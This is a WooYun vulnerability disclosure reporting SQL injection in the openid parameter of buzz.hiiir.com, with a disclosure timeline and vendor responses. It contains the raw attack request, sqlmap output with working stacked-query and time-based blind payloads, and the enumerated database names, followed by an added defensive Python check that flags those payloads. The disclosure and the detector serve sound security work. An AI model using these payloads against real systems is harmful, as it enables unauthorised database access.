WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles online--------http://drop.zone.ci/
2015-10-26: Details sent to the vendor, awaiting vendor handling
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and experts in the relevant field
2015-11-15: Details disclosed to ordinary white hats
2015-11-23: Vendor fixed the vulnerability and disclosed it proactively; details disclosed to the public
As the title says.
POST /User/confirmopenid/ HTTP/1.1
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://buzz.hiiir.com/
Cookie: PHPSESSID=1220aae1u89t98vsfkr74fe9q3; _Timer=2; __utmt=1; __utma=112679063.348446717.1445834033.1445834033.1445834033.1; __utmb=112679063.2.10.1445834033; __utmc=112679063; __utmz=112679063.1445834033.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); __atuvc=1%7C43; __atuvs=562dacff6159b6b8000
Host: buzz.hiiir.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

openid=*
The openid parameter is injectable.
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: openid=');(SELECT * FROM (SELECT(SLEEP(5)))Tebi)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: openid=') AND (SELECT * FROM (SELECT(SLEEP(5)))GTDK) AND ('aBcF'='aBcF
---
web application technology: PHP 5.2.10
back-end DBMS: MySQL 5.0.11
available databases [8]:
[*] Hiiir_Rss
[*] Hiiir_Statistics
[*] HiiirAdPower
[*] HiiirHero
[*] HiiirLog
[*] HiiirRepl
[*] HiiirTrack
[*] information_schema
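Added defender-side example, not part of the original report: a small Python check that flags form-encoded POST bodies whose openid value carries the indicators behind the two sqlmap techniques above (an early quote close, a stacked statement after ';', a SLEEP/BENCHMARK delay, a trailing comment, an always-true tail). The two injected payloads are the ones from the sqlmap output; the benign value and the function names are mine.

```python
import re
from urllib.parse import parse_qs, urlencode

# Indicators drawn from the two payloads sqlmap reported against /User/confirmopenid/.
# Names and regexes are this example's own, not sqlmap's.
INDICATORS = {
    "quote_breakout": re.compile(r"'\s*\)"),                      # closes a ('...') literal early
    "stacked_query":  re.compile(r";\s*\(?\s*select\b", re.I),    # ; (SELECT ...  after the breakout
    "time_delay":     re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "comment_tail":   re.compile(r"(#|--\s|/\*)"),                # discards the app's own query tail
    "tautology":      re.compile(r"'(\w+)'\s*=\s*'\1\b", re.I),   # 'aBcF'='aBcF keeps the WHERE true
}

# Constructed sample values: the first two are the payloads from the report, the third is a normal openid.
PAGE_PAYLOADS = {
    "stacked": "');(SELECT * FROM (SELECT(SLEEP(5)))Tebi)#",
    "blind":   "') AND (SELECT * FROM (SELECT(SLEEP(5)))GTDK) AND ('aBcF'='aBcF",
    "benign":  "https://example.com/id/12345",
}

def form_body(openid: str) -> str:
    """Build the application/x-www-form-urlencoded body the endpoint receives."""
    return urlencode({"openid": openid})

def openid_value(body: str) -> str:
    """Extract and URL-decode the openid field from a form-encoded POST body."""
    return parse_qs(body, keep_blank_values=True).get("openid", [""])[0]

def classify_openid(body: str) -> list:
    """Return the names of the indicators present in the openid value, in INDICATORS order."""
    value = openid_value(body)
    return [name for name, rx in INDICATORS.items() if rx.search(value)]

def is_suspicious(body: str) -> bool:
    """A delay or stacked statement alone is decisive; otherwise require two indicators,
    so a lone apostrophe in a legitimate value does not trip the check."""
    hits = classify_openid(body)
    return "time_delay" in hits or "stacked_query" in hits or len(hits) >= 2

if __name__ == "__main__":
    for label, payload in PAGE_PAYLOADS.items():
        body = form_body(payload)
        print(label, is_suspicious(body), classify_openid(body))
```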
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-10-26 18:17
This site is one of the company's early services and has not been maintained since, but we still thank you for your report and will handle it as soon as possible.
2015-11-23: Some of these services are early company services whose operation will be suspended; they have now been taken offline. Thank you again for the vulnerability report; we will continue to strengthen our internal management processes.